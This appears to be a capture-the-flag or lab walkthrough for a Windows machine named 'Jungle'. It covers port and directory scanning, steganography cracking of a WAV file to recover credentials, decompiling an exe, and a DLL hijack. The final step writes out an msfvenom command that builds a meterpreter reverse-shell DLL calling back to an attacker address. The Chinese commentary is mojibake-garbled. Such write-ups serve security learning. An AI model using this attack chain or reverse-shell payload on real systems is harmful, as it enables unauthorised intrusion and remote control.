Nmap
[root@Hacking] /home/kali/Jungle
โฏ nmap 192.168.55.161 -A -p-
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Welcome to the Jungle - The Hex Guns
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Dirsearch
[root@Hacking] /home/kali/Jungle
โฏ feroxbuster -u http://192.168.55.161 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher ๐ค ver: 2.11.0
โโโโโโโโโโโโโโโโโโโโโโโโโโโโฌโโโโโโโโโโโโโโโโโโโโโโ
๐ฏ Target Url โ http://192.168.55.161
๐ Threads โ 50
๐ Wordlist โ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
๐ Status Codes โ All Status Codes!
๐ฅ Timeout (secs) โ 7
๐ฆก User-Agent โ feroxbuster/2.11.0
๐ Config File โ /etc/feroxbuster/ferox-config.toml
๐ Extract Links โ true
๐ฒ Extensions โ [php]
๐ HTTP methods โ [GET]
๐ Recursion Depth โ 4
โโโโโโโโโโโโโโโโโโโโโโโโโโโโดโโโโโโโโโโโโโโโโโโโโโโ
๐ Press [ENTER] to use the Scan Management Menuโข
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
404 GET 29l 94w 1251c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 2l 10w 160c http://192.168.55.161/img => http://192.168.55.161/img/
200 GET 29l 124w 1209c http://192.168.55.161/index.php
200 GET 42l 168w 1915c http://192.168.55.161/albums.php
301 GET 2l 10w 162c http://192.168.55.161/media => http://192.168.55.161/media/
200 GET 126l 218w 2089c http://192.168.55.161/css/styles.css
200 GET 7l 13w 189c http://192.168.55.161/header.php
200 GET 8487l 45658w 3909539c http://192.168.55.161/img/axl.png
200 GET 29l 124w 1209c http://192.168.55.161/
200 GET 3l 11w 81c http://192.168.55.161/footer.php
403 GET 29l 91w 1232c http://192.168.55.161/css/
301 GET 2l 10w 160c http://192.168.55.161/css => http://192.168.55.161/css/
200 GET 29l 124w 1209c http://192.168.55.161/Index.php
301 GET 2l 10w 162c http://192.168.55.161/Media => http://192.168.55.161/Media/
200 GET 7731l 46736w 3824296c http://192.168.55.161/img/digital-destruction.png
200 GET 9162l 55315w 4712528c http://192.168.55.161/img/paradise-404.png
200 GET 8321l 48830w 4266377c http://192.168.55.161/img/neon-rebellion.png
301 GET 2l 10w 160c http://192.168.55.161/IMG => http://192.168.55.161/IMG/
200 GET 7l 13w 189c http://192.168.55.161/Header.php
200 GET 29l 124w 1209c http://192.168.55.161/INDEX.php
301 GET 2l 10w 160c http://192.168.55.161/CSS => http://192.168.55.161/CSS/
301 GET 2l 10w 160c http://192.168.55.161/Img => http://192.168.55.161/Img/
200 GET 3l 11w 81c http://192.168.55.161/Footer.php
301 GET 2l 10w 162c http://192.168.55.161/MEDIA => http://192.168.55.161/MEDIA/
200 GET 7l 13w 189c http://192.168.55.161/HEADER.php
200 GET 3l 11w 81c http://192.168.55.161/FOOTER.php
[####################] - 5m 1984940/1984940 0s found:25 errors:0
[####################] - 5m 220546/220546 722/s http://192.168.55.161/
[####################] - 5m 220546/220546 721/s http://192.168.55.161/img/
[####################] - 5m 220546/220546 720/s http://192.168.55.161/media/
[####################] - 5m 220546/220546 721/s http://192.168.55.161/css/
[####################] - 5m 220546/220546 722/s http://192.168.55.161/Media/
[####################] - 5m 220546/220546 723/s http://192.168.55.161/IMG/
[####################] - 5m 220546/220546 728/s http://192.168.55.161/CSS/
[####################] - 5m 220546/220546 729/s http://192.168.55.161/Img/
[####################] - 5m 220546/220546 797/s http://192.168.55.161/MEDIA/
้ๅฏน/media็ฎๅฝ่ฟ่กๆซๆ๏ผๅ็ฐไธไธชๅ็ผฉๅ
[root@Hacking] /home/kali/Jungle
โฏ feroxbuster -u http://192.168.55.161/media -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x zip
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher ๐ค ver: 2.11.0
โโโโโโโโโโโโโโโโโโโโโโโโโโโโฌโโโโโโโโโโโโโโโโโโโโโโ
๐ฏ Target Url โ http://192.168.55.161/media
๐ Threads โ 50
๐ Wordlist โ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
๐ Status Codes โ All Status Codes!
๐ฅ Timeout (secs) โ 7
๐ฆก User-Agent โ feroxbuster/2.11.0
๐ Config File โ /etc/feroxbuster/ferox-config.toml
๐ Extract Links โ true
๐ฒ Extensions โ [zip]
๐ HTTP methods โ [GET]
๐ Recursion Depth โ 4
โโโโโโโโโโโโโโโโโโโโโโโโโโโโดโโโโโโโโโโโโโโโโโโโโโโ
๐ Press [ENTER] to use the Scan Management Menuโข
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
404 GET 29l 94w 1251c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 2l 10w 162c http://192.168.55.161/media => http://192.168.55.161/media/
200 GET 11l 74w 5642c http://192.168.55.161/media/songs.zip
200 GET 11l 74w 5642c http://192.168.55.161/media/Songs.zip
[####################] - 35s 220547/220547 0s found:3 errors:0
[####################] - 34s 220546/220546 6468/s http://192.168.55.161/media/
Stegseek
่ฟ่ก่งฃๅ
[root@Hacking] /home/kali/Jungle
โฏ unzip songs.zip
Archive: songs.zip
inflating: digital_destruction.txt
inflating: neon_rebellion.txt
inflating: paradaise_404.txt
inflating: solo_final.wav
[root@Hacking] /home/kali/Jungle
โฏ ls
digital_destruction.txt neon_rebellion.txt paradaise_404.txt solo_final.wav songs.zip
[root@Hacking] /home/kali/Jungle
โฏ cat digital_destruction.txt
Binary burns through the wires,
1s and 0s flying higher...
# nothing special here
[root@Hacking] /home/kali/Jungle
โฏ cat neon_rebellion.txt
Rise against the static tide,
firewalls can't stop our ride.
[root@Hacking] /home/kali/Jungle
โฏ cat paradaise_404.txt
They tried to hide, but we still found,
The jungle echoes with a sound...
There's always one password weโve used since the first rehearsal...
่ฟ้ๆ็ฝ้กตๆบ็ ็ปChatGPT็ๆๅฏ็ ็ปๅ๏ผๅ็ฐๅฏ็ ๅฐฑๆฏthehexguns
[root@Hacking] /home/kali/Jungle
โฏ stegseek solo_final.wav pass.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "thehexguns"
[i] Original filename: "password.txt".
[i] Extracting to "solo_final.wav.out".
[root@Hacking] /home/kali/Jungle
โฏ cat solo_final.wav.out
Password:sweetjungle2025
URL:theh3xgun5
IDA
ๅพๅฐไธไธชๅฏ็ ๅญ็ฌฆไธฒๅURL๏ผไฝๆฏ็จๆทๅๅนถไธๆฏadmin
ๅจ็ฝ้กตๆบ็ ไธญๅ็ฐไบ็จๆทๅๆฏslash
็ปๅฝๅฐURL๏ผๅฏไปฅไธ่ฝฝไธไธชexeๆไปถ
ๆ่ฟIDA่ฟ่กๅ็ผ่ฏ
ๅ็ฐ็จๆทๅญ่ฏ๏ผๅฏไปฅ่ฟ็จ็ปๅฝ
DLL Hijack
่ฟๅ
ฅๅฐHexGuns็ฎๅฝ๏ผๅ็ฐ็ผบๅคฑไบconfig.dll
setlist_uploader.exeๅ็ผ่ฏ็็ปๆไนๆฏ่ฏดๆ้่ฆconfig.dll
ๅ ๆญค่ชๅทฑ็ๆไธไธชๆถๆ็dllๆฅๅๅผน
[root@Hacking] /home/kali/Jungle
โฏ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.55.4 LPORT=4444 -f dll -o config.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 9216 bytes
Saved as: config.dll
ไธไผ ๅฐ็ฎๅฝ้
็ถๅ็ญๅพ
่ขซๆง่ก๏ผๆ่
ๆๅจ้ๅฏไธไธๆบๅจ๏ผ๏ผๅณๅฏ่ทๅพmeterpreter
